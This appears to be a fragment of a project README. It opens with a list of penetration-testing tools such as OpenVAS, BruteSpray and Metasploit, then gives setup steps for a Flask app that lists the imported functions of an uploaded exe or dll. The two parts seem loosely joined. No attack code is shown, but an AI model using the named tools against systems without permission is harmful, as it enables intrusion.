  • OpenVAS
• Exploit
  • BruteSpray
  • Metasploit
• Visualize
  • Faraday
• CUI-GUI switching

• OS: KAli Linux 2019.4
• Memory: 8.0GB

pip install flask
pip install pefile
pip install requests

$ python flaskapp.py

1. Upload the exe or dll.

2. The function of exe and dll will appear.

3. We need to just click any of the function. For example, purpose lets choose LoadLibraryA.

4. The code usage of any function can be extracted by clicking on these options.